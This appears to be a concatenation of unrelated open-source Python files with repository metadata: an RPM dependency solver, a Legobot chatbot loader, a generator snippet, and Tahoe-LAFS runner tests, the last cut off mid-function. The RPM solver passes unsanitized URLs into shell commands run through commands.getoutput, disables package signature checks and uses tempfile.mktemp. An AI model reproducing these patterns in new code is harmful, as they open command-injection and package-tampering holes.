self.solver_db = self.db(rpm_dir, recursive, work_dir)
self.solver_db.populate_db(self.verbose, self.pb, 1, self.progress)
self.use_avail = 0
self._initdb = 1
if avail_dir:
self.avail_db = self.db(avail_dir, recursive)
self.avail_db.populate_db(self.verbose, self.pb, 0, self.progress)
self.use_avail = 1
def add(self, file):
""" Add a new file to the solver db """
self.solver_db.add(self.avail_db.rpm_filenames[file])
def what_provides(self, solver_db, name, version=None):
""" Given a name and a version, see what provides it """
for hdr_key in solver_db.rpmdb.keys():
provides = solver_db.rpmdb[hdr_key][rpm.RPMTAG_PROVIDES]
if name in provides:
if version:
version_check = solver_db.rpmdb[hdr_key][rpm.RPMTAG_VERSION]
if version == version_check:
return hdr_key
else:
return hdr_key
file_list = solver_db.rpmdb[hdr_key][rpm.RPMTAG_FILENAMES]
if name in file_list:
return hdr_key
return None
def dep_closure(self):
""" Determine if they have dependency closure """
needed = []
problems = []
if self._initdb:
missing_deps = self.solver_db.ts.check()
if self.verbose > 1:
print "->Result of solver_db.ts.check():"
print missing_deps
if len(missing_deps):
for dep in missing_deps:
# XXX FIXME
# Okay, we completely ignore the version here, which is
# wrong wrong WRONG! We should be smacked.
if self.use_avail:
package = self.what_provides(self.avail_db, dep[1][0], dep[1][1])
if package and (not package in needed):
needed.append(package)
else:
problems.append("%s needs %s" % (dep[0][0], dep[1][0]))
else:
package = self.what_provides(self.solver_db, dep[1][0])
if package and (not package in needed):
needed.append(package)
else:
problems.append("%s needs %s" % (dep[0][0], dep[1][0]))
else:
problems.append("Database has not been populated")
return needed, problems
def _get_filename_from_hdr(self, pkg_te):
""" Given a package name, find the filename for it """
pkg = pkg_te.N()
for name in self.solver_db.rpmdb.keys():
if pkg == self.solver_db.rpmdb[name][rpm.RPMTAG_NAME]:
return name
return None
def order_solver(self, fullname=1):
""" Once the database has been populated, try to solve the order """
order_pkg = []
order_filename = []
self.solver_db.ts.order()
while 1:
try:
order_pkg.append(self.solver_db.ts.next())
except:
break
for pkg in order_pkg:
if fullname:
order_filename.append(self._get_filename_from_hdr(pkg))
else:
order_filename.append(pkg.N())
return order_filename
class db:
def __init__(self, rpm_dir=".", recurse=1, work_dir=tempfile.mkdtemp(), ext="*.rpm"):
self.rpm_dir = rpm_dir
self.recurse = recurse
self.rpmdb = {}
self.ext = ext
self.tmp_dir = work_dir
self.ts = rpm.TransactionSet(self.tmp_dir)
self.ts.setVSFlags(rpm._RPMVSF_NOSIGNATURES)
def close(self):
self.ts.closeDB()
for root, dirs, files in os.walk(self.tmp_dir, topdown=False):
for name in files:
os.remove(os.path.join(root, name))
for name in dirs:
os.rmdir(os.path.join(root, name))
def get_rpmdb_size(self):
return len(self.rpmdb)
def populate_db(self, verbose, pb, pop_trans=1, progress=0):
""" Populate our own DB :-)"""
self.rpm_filenames = self._list_files()
i = 0.0
if progress:
pb.set("Populate RPMDB :")
for name in self.rpm_filenames.keys():
filename = self.rpm_filenames[name]
if verbose: print "rpm_solver.db.populate_db : Adding " + str(filename)
if progress:
i = i + 1.0
percent = i / len(self.rpm_filenames)
pb.progress(percent)
self.add(filename, pop_trans)
if progress:
pb.clear()
if verbose > 1:
print ("->The contents of this transaction set for %s:" % self.rpm_dir)
for tx in self.ts:
print tx
def add(self, filename, pop_trans=1):
if filename.startswith("http://"):
# XXX FIXME:
# Okay, I give up about doing this nicely. Screw it.
tmpfile = tempfile.mktemp()
problem = 0
while 1:
output = commands.getoutput("wget -O %s %s" % (tmpfile, filename))
try:
fdno = os.open(tmpfile, os.O_RDONLY)
os.close(fdno)
break
except:
if problem > 10:
print "FATAL ERROR!"
print "Could not download " + filename
sys.exit(2)
else:
problem = problem + 1
localfile = tmpfile
else:
localfile = filename
try:
fname = filename.split("/")[-1]
except:
fname = filename
fdno = os.open(localfile, os.O_RDONLY)
hdr = self.ts.hdrFromFdno(fdno)
os.close(fdno)
self.rpmdb[fname] = hdr
if pop_trans:
self.ts.addInstall(hdr,None)
if filename.startswith("http://"):
os.unlink(tmpfile)
def _list_files(self):
"""List all the files in a directory"""
root = self.rpm_dir
patterns = self.ext
recurse = self.recurse
return_folders = 0
if root.startswith("http://"):
output = commands.getoutput("links -dump %s | grep \"http://\" | grep \".rpm\" | awk '{print $2}'" % root)
results = output.split("\n")
return results
else:
# Expand patterns from semicolon-separated string to list
pattern_list = patterns.split(';')
class Bunch:
def __init__(self, **kwds): self.__dict__.update(kwds)
arg = Bunch(recurse=recurse, pattern_list=pattern_list, return_folders=return_folders, results={})
def visit(arg, dirname, files):
# Append to arg.results all relevant files
for name in files:
fullname = os.path.normpath(os.path.join(dirname, name))
fullname = fullname.rstrip()
if arg.return_folders or os.path.isfile(fullname):
for pattern in arg.pattern_list:
if fnmatch.fnmatch(name, pattern):
arg.results[name] = fullname
break
# Block recursion if disallowed
if not arg.recurse: files[:]=[]
os.path.walk(root, visit, arg)
return arg.results
def process(rpm_dir, solve_dir, yes_solve, check_only, recursive, progress, verbose, pdk_output, work_dir):
""" Main process if ran from command line """
solver = rpm_solver(progress, verbose)
solver.init_db(rpm_dir, solve_dir, recursive, work_dir)
needed, problems = solver.dep_closure()
solver_steps = []
while len(needed):
print "Error! The following packages are needed for dependency closure:\n"
for pkg in needed:
print "\t" + str(pkg)
if yes_solve or (raw_input("Solve for dependency? (y/N): ") in ("y", "yes", "Y")):
for pkg in needed:
from_file = solver.avail_db.rpm_filenames[pkg]
solver_steps.append("cp -f %s %s" %(from_file, rpm_dir))
solver.add(pkg)
needed, problems = solver.dep_closure()
else:
break
if len(solver_steps):
for line in solver_steps:
print line
if len(problems):
print "Error! The following problems were encountered:\n"
for pkg in problems:
print "\t" + str(pkg)
if len(problems) or len(needed):
sys.exit(2)
elif check_only:
print ("The RPMs in %s have dependency closure" % rpm_dir)
else:
# Okay we do stuff
if pdk_output:
ordered = solver.order_solver(0)
else:
ordered = solver.order_solver(1)
i = 0
for name in ordered:
if pdk_output:
print ("<rpm><name>%s</name><meta><pass>%d</pass></meta></rpm>" % (name, i))
else:
print ("%d:%s" % (i, name))
i = i + 1
def usage():
print "rpm_solver.py -"
print " Given a directory of RPMs, attempt to order their"
print "installation or determine if they have dependency closure."
print "\nUSAGE:"
print " rpm-solver.py [options] <RPM_DIR>"
print "\nWhere [options] may be one of the following:"
print "\t-c | --check\tCheck for dependency closure only"
print "\t-s | --solve\tUse the pool of rpms specified for solving"
print "\t-y | --yes\tAssume 'y' when -s can solve for dependency"
print "\t-v | --verbose\tBe verbose in processing"
print "\t-p | --progress\tUse progress bar"
print "\t-r | --recursive\tScan RPM_DIR recursively"
print "\t-k | --pdk\t\tProduce PDK ready XML snippits"
print "\t-w | --work\t\tSupply a work dir (typically chroot) for rpmdb"
print "\n\n"
def main():
try:
opts, args = getopt.getopt(sys.argv[1:], "vprs:cuykw:", ["verbose", "progress", "recursive", "solve=", "check", "yes", "pdk", "work="])
except getopt.GetoptError:
# print help information and exit:
usage()
sys.exit(2)
verbose = 0
progress = 0
recursive = 0
solve_dir = None
check_only = 0
yes_solve = 0
pdk_output = 0
work_dir = tempfile.mkdtemp()
if len(sys.argv) < 2:
usage()
sys.exit(2)
rpm_dir = sys.argv[-1]
for o, a in opts:
if o in ("-v", "--verbose"):
verbose = verbose + 1
if o in ("-p", "--progress"):
progress = 1
if o in ("-r", "--recursive"):
recursive = 1
if o in ("-s", "--solve"):
solve_dir = a
if o in ("-c", "--check"):
check_only = 1
if o in ("-y", "--yes"):
yes_solve = 1
if o in ("-k", "--pdk"):
pdk_output = 1
if o in ("-w", "--work"):
work_dir = a
if verbose > 1: print "WARNING: Excessive debugging"
process(rpm_dir, solve_dir, yes_solve, check_only, recursive, progress, verbose, pdk_output, work_dir)
if __name__ == "__main__":
main()
# vim:set ai et sts=4 sw=4 tw=80:
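# Editor's note: typical invocations, following usage() above (paths are
# illustrative):
#
#     ./rpm_solver.py -c /srv/rpms              # check dependency closure only
#     ./rpm_solver.py -p -s /srv/pool /srv/rpms # solve against a pool, with progress bar
#     ./rpm_solver.py -k /srv/rpms              # emit PDK-ready XML snippets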
|
blipvert/rpmstrap
|
tools/rpm_solver.py
|
Python
|
gpl-2.0
| 14,705
|
import logging
import os
from pathlib import Path
from pydoc import locate
import re
import threading
from jsonschema import validate
import yaml
from Legobot.Lego import Lego
DIR = Path(__file__).resolve().parent
HELP_PATH = 'Legobot.Legos.Help.Help'
def build_logger(log_file=None, level=None):
if (
not level
or not isinstance(level, str)
or level.upper() not in ['INFO', 'DEBUG', 'ERROR']
):
level = 'DEBUG'
level = getattr(logging, level.upper())
if log_file:
logging.basicConfig(filename=log_file)
logger = logging.getLogger()
logger.setLevel(level)
ch = logging.StreamHandler()
ch.setLevel(level)
# create formatter and add it to the handlers
formatter = logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
# add the handlers to the logger
logger.addHandler(ch)
return logger
def load_yaml_file(path, default=None, raise_ex=None, logger=None):
if not logger:
logger = build_logger()
if not isinstance(path, Path):
path = Path(path)
try:
with path.open() as f:
out = yaml.safe_load(f)
logger.debug(f'Loaded {path} successfully.')
except Exception as e:
out = default
if raise_ex is True:
            raise e
else:
logger.error(f'Error loading {path}:\n {e}\nReturning default.')
return out
def replace_vars(data):
if isinstance(data, dict):
for k, v in data.items():
data[k] = replace_vars(v)
elif isinstance(data, list):
for i in range(len(data)):
data[i] = replace_vars(data[i])
elif isinstance(data, str):
for var in re.findall(r'\$\{\{[a-zA-Z0-9._:, -]+\}\}', data):
var_items = var[3:-2].split('::')
var_str = var_items.pop(-1)
for cmd in reversed(var_items):
if cmd == 'ENV':
var_str = os.environ.get(var_str, var_str)
elif cmd == 'LIST':
var_str = [v.strip() for v in var_str.split(',')]
var_str = replace_vars(var_str)
if isinstance(var_str, list):
data = var_str
else:
data = data.replace(var, var_str)
return data
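# Editor's note: a quick illustration of the ${{...}} grammar handled above
# (values hypothetical). Commands sit left of the value, separated by '::',
# and the rightmost command runs first:
#
#     os.environ['API_TOKEN'] = 'abc123'
#     replace_vars({'auth': '${{ENV::API_TOKEN}}'})  # -> {'auth': 'abc123'}
#     replace_vars('${{LIST::a, b, c}}')             # -> ['a', 'b', 'c']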
class Chatbot(object):
def __init__(self, config_path=None):
self.schema = load_yaml_file(
DIR.joinpath('chatbot_schema.yaml'), raise_ex=True)
self.config = self.load_config(config_path)
self.logger = build_logger(
self.config.get('log_file'), self.config.get('log_level'))
self.baseplate = None
self.baseplate_proxy = None
self.connectors = []
self.legos = []
def load_config(self, config_path):
config = load_yaml_file(config_path, raise_ex=True)
config = replace_vars(config)
validate(config, self.schema)
return config
def initialize_baseplate(self):
lock = threading.Lock()
self.baseplate = Lego.start(None, lock)
self.baseplate_proxy = self.baseplate.proxy()
def add_lego(self, name, config, lego_type):
if config['enabled'] is True:
try:
self.baseplate_proxy.add_child(
locate(config['path']), **config.get('kwargs', {}))
if lego_type == 'connectors':
self.connectors.append(name)
elif lego_type == 'legos':
self.legos.append(name)
except Exception as e:
self.logger.error(f'Error adding {name} to {lego_type}: {e}')
def run(self):
if not self.baseplate:
self.initialize_baseplate()
if self.config['helpEnabled'] is True:
self.add_lego(
'Help', {'enabled': True, 'path': HELP_PATH}, 'legos')
for connector, config in self.config['connectors'].items():
self.add_lego(connector, config, 'connectors')
for lego, config in self.config['legos'].items():
self.add_lego(lego, config, 'legos')
def stop(self):
self.baseplate.stop()
self.baseplate_proxy = None
self.baseplate = None
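# Editor's note: minimal usage sketch (config path hypothetical; the YAML file
# must validate against chatbot_schema.yaml):
#
#     bot = Chatbot(config_path='config.yaml')
#     bot.run()   # starts the baseplate, then attaches connectors and legos
#     ...
#     bot.stop()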
|
bbriggs/Legobot
|
Legobot/Chatbot.py
|
Python
|
gpl-2.0
| 4,280
|
def fib():
a, b = 0, 1
while True:
yield a
a, b = b, a+b
f = fib()
for i in range(10): # print the first ten Fibonacci numbers
print f.next(), # 0 1 1 2 3 5 8 13 21 34
####################
# loop through a generator
for item in function_that_returns_a_generator(param1, param2):
print item
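####################
# editor's sketch: slice a fresh generator lazily with itertools
# (each call to fib() starts a new, independent stream)
from itertools import islice
print list(islice(fib(), 10))   # [0, 1, 1, 2, 3, 5, 8, 13, 21, 34]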
|
jabbalaci/PrimCom
|
data/python/my_generator.py
|
Python
|
gpl-2.0
| 332
|
from twisted.trial import unittest
from twisted.python import usage, runtime
from twisted.internet import threads
import os.path, re, sys, subprocess
from cStringIO import StringIO
from allmydata.util import fileutil, pollmixin
from allmydata.util.encodingutil import unicode_to_argv, unicode_to_output, get_filesystem_encoding
from allmydata.scripts import runner
from allmydata.test import common_util
import allmydata
timeout = 240
def get_root_from_file(src):
srcdir = os.path.dirname(os.path.dirname(os.path.normcase(os.path.realpath(src))))
root = os.path.dirname(srcdir)
if os.path.basename(srcdir) == 'site-packages':
if re.search(r'python.+\..+', os.path.basename(root)):
root = os.path.dirname(root)
root = os.path.dirname(root)
elif os.path.basename(root) == 'src':
root = os.path.dirname(root)
return root
srcfile = allmydata.__file__
rootdir = get_root_from_file(srcfile)
if hasattr(sys, 'frozen'):
bintahoe = os.path.join(rootdir, 'tahoe')
if sys.platform == "win32" and os.path.exists(bintahoe + '.exe'):
bintahoe += '.exe'
else:
bintahoe = os.path.join(rootdir, 'bin', 'tahoe')
if sys.platform == "win32":
bintahoe += '.pyscript'
if not os.path.exists(bintahoe):
alt_bintahoe = os.path.join(rootdir, 'Scripts', 'tahoe.pyscript')
if os.path.exists(alt_bintahoe):
bintahoe = alt_bintahoe
class RunBinTahoeMixin:
def skip_if_cannot_run_bintahoe(self):
if not os.path.exists(bintahoe):
raise unittest.SkipTest("The bin/tahoe script isn't to be found in the expected location (%s), and I don't want to test a 'tahoe' executable that I find somewhere else, in case it isn't the right executable for this version of Tahoe. Perhaps running 'setup.py build' again will help." % (bintahoe,))
def skip_if_cannot_daemonize(self):
self.skip_if_cannot_run_bintahoe()
if runtime.platformType == "win32":
# twistd on windows doesn't daemonize. cygwin should work normally.
raise unittest.SkipTest("twistd does not fork under windows")
def run_bintahoe(self, args, stdin=None, python_options=[], env=None):
self.skip_if_cannot_run_bintahoe()
if hasattr(sys, 'frozen'):
if python_options:
raise unittest.SkipTest("This test doesn't apply to frozen builds.")
command = [bintahoe] + args
else:
command = [sys.executable] + python_options + [bintahoe] + args
if stdin is None:
stdin_stream = None
else:
stdin_stream = subprocess.PIPE
def _run():
p = subprocess.Popen(command, stdin=stdin_stream, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env)
(out, err) = p.communicate(stdin)
return (out, err, p.returncode)
return threads.deferToThread(_run)
class BinTahoe(common_util.SignalMixin, unittest.TestCase, RunBinTahoeMixin):
def _check_right_code(self, file_to_check):
root_to_check = get_root_from_file(file_to_check)
if os.path.basename(root_to_check) == 'dist':
root_to_check = os.path.dirname(root_to_check)
cwd = os.path.normcase(os.path.realpath("."))
root_from_cwd = os.path.dirname(cwd)
if os.path.basename(root_from_cwd) == 'src':
root_from_cwd = os.path.dirname(root_from_cwd)
same = (root_from_cwd == root_to_check)
if not same:
try:
same = os.path.samefile(root_from_cwd, root_to_check)
except AttributeError, e:
e # hush pyflakes
if not same:
msg = ("We seem to be testing the code at %r,\n"
"(according to the source filename %r),\n"
"but expected to be testing the code at %r.\n"
% (root_to_check, file_to_check, root_from_cwd))
root_from_cwdu = os.path.dirname(os.path.normcase(os.path.normpath(os.getcwdu())))
if os.path.basename(root_from_cwdu) == u'src':
root_from_cwdu = os.path.dirname(root_from_cwdu)
if not isinstance(root_from_cwd, unicode) and root_from_cwd.decode(get_filesystem_encoding(), 'replace') != root_from_cwdu:
msg += ("However, this may be a false alarm because the current directory path\n"
"is not representable in the filesystem encoding. Please run the tests\n"
"from the root of the Tahoe-LAFS distribution at a non-Unicode path.")
raise unittest.SkipTest(msg)
else:
msg += "Please run the tests from the root of the Tahoe-LAFS distribution."
self.fail(msg)
def test_the_right_code(self):
self._check_right_code(srcfile)
def test_import_in_repl(self):
d = self.run_bintahoe(["debug", "repl"],
stdin="import allmydata; print; print allmydata.__file__")
def _cb(res):
out, err, rc_or_sig = res
self.failUnlessEqual(rc_or_sig, 0, str(res))
lines = out.splitlines()
self.failUnlessIn('>>>', lines[0], str(res))
self._check_right_code(lines[1])
d.addCallback(_cb)
return d
def test_path(self):
d = self.run_bintahoe(["--version-and-path"])
def _cb(res):
from allmydata import normalized_version
out, err, rc_or_sig = res
self.failUnlessEqual(rc_or_sig, 0, str(res))
# Fail unless the allmydata-tahoe package is *this* version *and*
# was loaded from *this* source directory.
required_verstr = str(allmydata.__version__)
self.failIfEqual(required_verstr, "unknown",
"We don't know our version, because this distribution didn't come "
"with a _version.py and 'setup.py darcsver' hasn't been run.")
srcdir = os.path.dirname(os.path.dirname(os.path.normcase(os.path.realpath(srcfile))))
info = (res, allmydata.__appname__, required_verstr, srcdir)
appverpath = out.split(')')[0]
(appver, path) = appverpath.split(' (')
(app, ver) = appver.split(': ')
self.failUnlessEqual(app, allmydata.__appname__, info)
self.failUnlessEqual(normalized_version(ver), normalized_version(required_verstr), info)
self.failUnlessEqual(path, srcdir, info)
d.addCallback(_cb)
return d
def test_unicode_arguments_and_output(self):
self.skip_if_cannot_run_bintahoe()
tricky = u"\u2621"
try:
tricky_arg = unicode_to_argv(tricky, mangle=True)
tricky_out = unicode_to_output(tricky)
except UnicodeEncodeError:
raise unittest.SkipTest("A non-ASCII argument/output could not be encoded on this platform.")
d = self.run_bintahoe([tricky_arg])
def _cb(res):
out, err, rc_or_sig = res
self.failUnlessEqual(rc_or_sig, 1, str(res))
self.failUnlessIn("Unknown command: "+tricky_out, out)
d.addCallback(_cb)
return d
def test_run_with_python_options(self):
# -t is a harmless option that warns about tabs.
d = self.run_bintahoe(["--version"], python_options=["-t"])
def _cb(res):
out, err, rc_or_sig = res
self.failUnlessEqual(rc_or_sig, 0, str(res))
self.failUnless(out.startswith(allmydata.__appname__+':'), str(res))
d.addCallback(_cb)
return d
def test_version_no_noise(self):
self.skip_if_cannot_run_bintahoe()
from allmydata import get_package_versions, normalized_version
twisted_ver = get_package_versions()['Twisted']
if not normalized_version(twisted_ver) >= normalized_version('9.0.0'):
raise unittest.SkipTest("We pass this test only with Twisted >= v9.0.0")
d = self.run_bintahoe(["--version"])
def _cb(res):
out, err, rc_or_sig = res
self.failUnlessEqual(rc_or_sig, 0, str(res))
self.failUnless(out.startswith(allmydata.__appname__+':'), str(res))
self.failIfIn("DeprecationWarning", out, str(res))
errlines = err.split("\n")
self.failIf([True for line in errlines if (line != "" and "UserWarning: Unbuilt egg for setuptools" not in line
and "from pkg_resources import load_entry_point" not in line)], str(res))
if err != "":
raise unittest.SkipTest("This test is known not to pass on Ubuntu Lucid; see #1235.")
d.addCallback(_cb)
return d
class CreateNode(unittest.TestCase):
# exercise "tahoe create-node", create-introducer,
# create-key-generator, and create-stats-gatherer, by calling the
# corresponding code as a subroutine.
def workdir(self, name):
basedir = os.path.join("test_runner", "CreateNode", name)
fileutil.make_dirs(basedir)
return basedir
def run_tahoe(self, argv):
out,err = StringIO(), StringIO()
rc = runner.runner(argv, stdout=out, stderr=err)
return rc, out.getvalue(), err.getvalue()
def do_create(self, kind):
basedir = self.workdir("test_" + kind)
command = "create-" + kind
is_client = kind in ("node", "client")
tac = is_client and "tahoe-client.tac" or ("tahoe-" + kind + ".tac")
n1 = os.path.join(basedir, command + "-n1")
argv = ["--quiet", command, "--basedir", n1]
rc, out, err = self.run_tahoe(argv)
self.failUnlessEqual(err, "")
self.failUnlessEqual(out, "")
self.failUnlessEqual(rc, 0)
self.failUnless(os.path.exists(n1))
self.failUnless(os.path.exists(os.path.join(n1, tac)))
if is_client:
# tahoe.cfg should exist, and should have storage enabled for
# 'create-node', and disabled for 'create-client'.
tahoe_cfg = os.path.join(n1, "tahoe.cfg")
self.failUnless(os.path.exists(tahoe_cfg))
content = open(tahoe_cfg).read()
if kind == "client":
self.failUnless(re.search(r"\n\[storage\]\n#.*\nenabled = false\n", content), content)
else:
self.failUnless(re.search(r"\n\[storage\]\n#.*\nenabled = true\n", content), content)
self.failUnless("\nreserved_space = 1G\n" in content)
# creating the node a second time should be rejected
rc, out, err = self.run_tahoe(argv)
self.failIfEqual(rc, 0, str((out, err, rc)))
self.failUnlessEqual(out, "")
self.failUnless("is not empty." in err)
# Fail if there is a non-empty line that doesn't end with a
# punctuation mark.
for line in err.splitlines():
self.failIf(re.search("[\S][^\.!?]$", line), (line,))
# test that the non --basedir form works too
n2 = os.path.join(basedir, command + "-n2")
argv = ["--quiet", command, n2]
rc, out, err = self.run_tahoe(argv)
self.failUnlessEqual(err, "")
self.failUnlessEqual(out, "")
self.failUnlessEqual(rc, 0)
self.failUnless(os.path.exists(n2))
self.failUnless(os.path.exists(os.path.join(n2, tac)))
# test the --node-directory form
n3 = os.path.join(basedir, command + "-n3")
argv = ["--quiet", command, "--node-directory", n3]
rc, out, err = self.run_tahoe(argv)
self.failUnlessEqual(err, "")
self.failUnlessEqual(out, "")
self.failUnlessEqual(rc, 0)
self.failUnless(os.path.exists(n3))
self.failUnless(os.path.exists(os.path.join(n3, tac)))
# make sure it rejects too many arguments
argv = [command, "basedir", "extraarg"]
self.failUnlessRaises(usage.UsageError,
runner.runner, argv,
run_by_human=False)
# when creating a non-client, there is no default for the basedir
if not is_client:
argv = [command]
self.failUnlessRaises(usage.UsageError,
runner.runner, argv,
run_by_human=False)
def test_node(self):
self.do_create("node")
def test_client(self):
# create-client should behave like create-node --no-storage.
self.do_create("client")
def test_introducer(self):
self.do_create("introducer")
def test_key_generator(self):
self.do_create("key-generator")
def test_stats_gatherer(self):
self.do_create("stats-gatherer")
def test_subcommands(self):
# no arguments should trigger a command listing, via UsageError
self.failUnlessRaises(usage.UsageError,
runner.runner,
[],
run_by_human=False)
class RunNode(common_util.SignalMixin, unittest.TestCase, pollmixin.PollMixin,
RunBinTahoeMixin):
# exercise "tahoe start", for both introducer, client node, and
# key-generator, by spawning "tahoe start" as a subprocess. This doesn't
# get us figleaf-based line-level coverage, but it does a better job of
# confirming that the user can actually run "./bin/tahoe start" and
# expect it to work. This verifies that bin/tahoe sets up PYTHONPATH and
# the like correctly.
# This doesn't work on cygwin (it hangs forever), so we skip this test
# when we're on cygwin. It is likely that "tahoe start" itself doesn't
# work on cygwin: twisted seems unable to provide a version of
# spawnProcess which really works there.
def workdir(self, name):
basedir = os.path.join("test_runner", "RunNode", name)
fileutil.make_dirs(basedir)
return basedir
def test_introducer(self):
self.skip_if_cannot_daemonize()
basedir = self.workdir("test_introducer")
c1 = os.path.join(basedir, "c1")
HOTLINE_FILE = os.path.join(c1, "suicide_prevention_hotline")
TWISTD_PID_FILE = os.path.join(c1, "twistd.pid")
INTRODUCER_FURL_FILE = os.path.join(c1, "introducer.furl")
d = self.run_bintahoe(["--quiet", "create-introducer", "--basedir", c1])
def _cb(res):
out, err, rc_or_sig = res
self.failUnlessEqual(rc_or_sig, 0)
# by writing this file, we get ten seconds before the node will
            # exit. This ensures that even if the test fails (and the 'stop'
# command doesn't work), the client should still terminate.
open(HOTLINE_FILE, "w").write("")
# now it's safe to start the node
d.addCallback(_cb)
def _then_start_the_node(res):
return self.run_bintahoe(["--quiet", "start", c1])
d.addCallback(_then_start_the_node)
def _cb2(res):
out, err, rc_or_sig = res
open(HOTLINE_FILE, "w").write("")
errstr = "rc=%d, OUT: '%s', ERR: '%s'" % (rc_or_sig, out, err)
self.failUnlessEqual(rc_or_sig, 0, errstr)
self.failUnlessEqual(out, "", errstr)
# self.failUnlessEqual(err, "", errstr) # See test_client_no_noise -- for now we ignore noise.
# the parent (twistd) has exited. However, twistd writes the pid
# from the child, not the parent, so we can't expect twistd.pid
# to exist quite yet.
# the node is running, but it might not have made it past the
# first reactor turn yet, and if we kill it too early, it won't
# remove the twistd.pid file. So wait until it does something
# that we know it won't do until after the first turn.
d.addCallback(_cb2)
def _node_has_started():
return os.path.exists(INTRODUCER_FURL_FILE)
d.addCallback(lambda res: self.poll(_node_has_started))
def _started(res):
open(HOTLINE_FILE, "w").write("")
self.failUnless(os.path.exists(TWISTD_PID_FILE))
# rm this so we can detect when the second incarnation is ready
os.unlink(INTRODUCER_FURL_FILE)
return self.run_bintahoe(["--quiet", "restart", c1])
d.addCallback(_started)
def _then(res):
out, err, rc_or_sig = res
open(HOTLINE_FILE, "w").write("")
errstr = "rc=%d, OUT: '%s', ERR: '%s'" % (rc_or_sig, out, err)
self.failUnlessEqual(rc_or_sig, 0, errstr)
self.failUnlessEqual(out, "", errstr)
# self.failUnlessEqual(err, "", errstr) # See test_client_no_noise -- for now we ignore noise.
d.addCallback(_then)
# again, the second incarnation of the node might not be ready yet,
# so poll until it is
d.addCallback(lambda res: self.poll(_node_has_started))
# now we can kill it. TODO: On a slow machine, the node might kill
        # itself before we get a chance to, especially if spawning the
# 'tahoe stop' command takes a while.
def _stop(res):
open(HOTLINE_FILE, "w").write("")
self.failUnless(os.path.exists(TWISTD_PID_FILE))
return self.run_bintahoe(["--quiet", "stop", c1])
d.addCallback(_stop)
def _after_stopping(res):
out, err, rc_or_sig = res
open(HOTLINE_FILE, "w").write("")
# the parent has exited by now
errstr = "rc=%d, OUT: '%s', ERR: '%s'" % (rc_or_sig, out, err)
self.failUnlessEqual(rc_or_sig, 0, errstr)
self.failUnlessEqual(out, "", errstr)
# self.failUnlessEqual(err, "", errstr) # See test_client_no_noise -- for now we ignore noise.
# the parent was supposed to poll and wait until it sees
# twistd.pid go away before it exits, so twistd.pid should be
# gone by now.
self.failIf(os.path.exists(TWISTD_PID_FILE))
d.addCallback(_after_stopping)
def _remove_hotline(res):
os.unlink(HOTLINE_FILE)
return res
d.addBoth(_remove_hotline)
return d
test_introducer.timeout = 960
# This test hit the 120-second timeout on "Francois Lenny-armv5tel", then it hit a 240-second timeout on our feisty2.5 buildslave: http://allmydata.org/buildbot/builders/feisty2.5/builds/2381/steps/test/logs/test.log
# Then it hit the 480 second timeout on Francois's machine: http://tahoe-lafs.org/buildbot/builders/FranXois%20lenny-armv5tel/builds/449/steps/test/logs/stdio
def test_client_no_noise(self):
self.skip_if_cannot_daemonize()
from allmydata import get_package_versions, normalized_version
twisted_ver = get_package_versions()['Twisted']
if not normalized_version(twisted_ver) >= normalized_version('9.0.0'):
raise unittest.SkipTest("We pass this test only with Twisted >= v9.0.0")
basedir = self.workdir("test_client_no_noise")
c1 = os.path.join(basedir, "c1")
HOTLINE_FILE = os.path.join(c1, "suicide_prevention_hotline")
TWISTD_PID_FILE = os.path.join(c1, "twistd.pid")
PORTNUMFILE = os.path.join(c1, "client.port")
d = self.run_bintahoe(["--quiet", "create-client", "--basedir", c1, "--webport", "0"])
def _cb(res):
out, err, rc_or_sig = res
errstr = "cc=%d, OUT: '%s', ERR: '%s'" % (rc_or_sig, out, err)
assert rc_or_sig == 0, errstr
self.failUnlessEqual(rc_or_sig, 0)
            # By writing this file, we get forty seconds before the client will exit. This ensures
# that even if the 'stop' command doesn't work (and the test fails), the client should
# still terminate.
open(HOTLINE_FILE, "w").write("")
open(os.path.join(c1, "introducer.furl"), "w").write("pb://xrndsskn2zuuian5ltnxrte7lnuqdrkz@127.0.0.1:55617/introducer\n")
# now it's safe to start the node
d.addCallback(_cb)
def _start(res):
return self.run_bintahoe(["--quiet", "start", c1])
d.addCallback(_start)
def _cb2(res):
out, err, rc_or_sig = res
errstr = "cc=%d, OUT: '%s', ERR: '%s'" % (rc_or_sig, out, err)
open(HOTLINE_FILE, "w").write("")
self.failUnlessEqual(rc_or_sig, 0, errstr)
self.failUnlessEqual(out, "", errstr) # If you emit noise, you fail this test.
errlines = err.split("\n")
self.failIf([True for line in errlines if (line != "" and "UserWarning: Unbuilt egg for setuptools" not in line
and "from pkg_resources import load_entry_point" not in line)], errstr)
if err != "":
raise unittest.SkipTest("This test is known not to pass on Ubuntu Lucid; see #1235.")
# the parent (twistd) has exited. However, twistd writes the pid
# from the child, not the parent, so we can't expect twistd.pid
# to exist quite yet.
# the node is running, but it might not have made it past the
# first reactor turn yet, and if we kill it too early, it won't
# remove the twistd.pid file. So wait until it does something
# that we know it won't do until after the first turn.
d.addCallback(_cb2)
def _node_has_started():
return os.path.exists(PORTNUMFILE)
d.addCallback(lambda res: self.poll(_node_has_started))
# now we can kill it. TODO: On a slow machine, the node might kill
# itself before we get a chance to, especially if spawning the
# 'tahoe stop' command takes a while.
def _stop(res):
self.failUnless(os.path.exists(TWISTD_PID_FILE), (TWISTD_PID_FILE, os.listdir(os.path.dirname(TWISTD_PID_FILE))))
return self.run_bintahoe(["--quiet", "stop", c1])
d.addCallback(_stop)
return d
def test_client(self):
self.skip_if_cannot_daemonize()
basedir = self.workdir("test_client")
c1 = os.path.join(basedir, "c1")
HOTLINE_FILE = os.path.join(c1, "suicide_prevention_hotline")
TWISTD_PID_FILE = os.path.join(c1, "twistd.pid")
PORTNUMFILE = os.path.join(c1, "client.port")
d = self.run_bintahoe(["--quiet", "create-node", "--basedir", c1, "--webport", "0"])
def _cb(res):
out, err, rc_or_sig = res
self.failUnlessEqual(rc_or_sig, 0)
            # By writing this file, we get sixty seconds before the client will exit. This ensures
# that even if the 'stop' command doesn't work (and the test fails), the client should
# still terminate.
open(HOTLINE_FILE, "w").write("")
open(os.path.join(c1, "introducer.furl"), "w").write("pb://xrndsskn2zuuian5ltnxrte7lnuqdrkz@127.0.0.1:55617/introducer\n")
# now it's safe to start the node
d.addCallback(_cb)
def _start(res):
return self.run_bintahoe(["--quiet", "start", c1])
d.addCallback(_start)
def _cb2(res):
out, err, rc_or_sig = res
open(HOTLINE_FILE, "w").write("")
errstr = "rc=%d, OUT: '%s', ERR: '%s'" % (rc_or_sig, out, err)
